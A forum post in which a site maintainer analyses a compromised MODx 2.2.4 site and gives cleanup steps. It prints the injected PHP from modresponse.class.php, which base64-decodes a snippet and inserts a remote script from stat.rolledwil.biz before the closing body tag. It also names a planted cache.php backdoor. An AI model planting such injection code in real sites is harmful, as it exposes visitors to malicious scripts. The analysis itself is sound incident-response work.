Hi everyone,
I'm not a MODx guy, but I did inherit a site from a client that runs MODx 2.2.4. I noticed that their site was hit by this bug and decided to do some debugging to determine exactly how this code is being injected in to the site. By messing around with a few things I was able to determine that the closing body tag was being replaced with the exploit code. Further digging in to MODx's template / parsing engine led me to find the following code in
/core/model/modx/modresponse.class.php at line 188:
if ($_SERVER["HTTP_REFERER"]!='') {
$linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
$param = str_replace('.','',$_SERVER['SERVER_ADDR']);
$linker = str_replace('<replace>', $param, $linker );
$this->modx->resource->_output = str_replace("</body>", $linker."\n</body>", $this->modx->resource->_output); }
In short, what the above does is: If there is an HTTP referrer in the browser headers, replace the closing body tag with the following:
<noindex>
<script src="//stat.rolledwil.biz/stat.php?(IP of server with periods stripped)"></script>
</noindex>
</body>
Someone else has already posted an analysis of what the included script does, so I won't go in to that.
Anyway, most of you are probably here looking for the solution. I don't have a complete answer but here is something to get you started:
- You more than likely have a cache.php in your /assets/ folder. DELETE THIS FILE as it is a remote execution exploit that allows hackers to run commands on your server.
- Either replace your modresponse.class.php with an original source file or open it up and delete the code described above.
The big question is how the original cache.php was placed on the server to begin with. It could be due to an exploit in a plugin or in the core system. In my case, the cache.php file has been on the server for close to a year but a handful of plugins have been updated since, so I don't really have a way to start looking in to this. If I find that the cache.php file somehow makes it back on to the server, I'll investigate further to see if I can figure out what's being exploited.
Good luck.
[ed. note: mmatos last edited this post 9 years, 10 months ago.]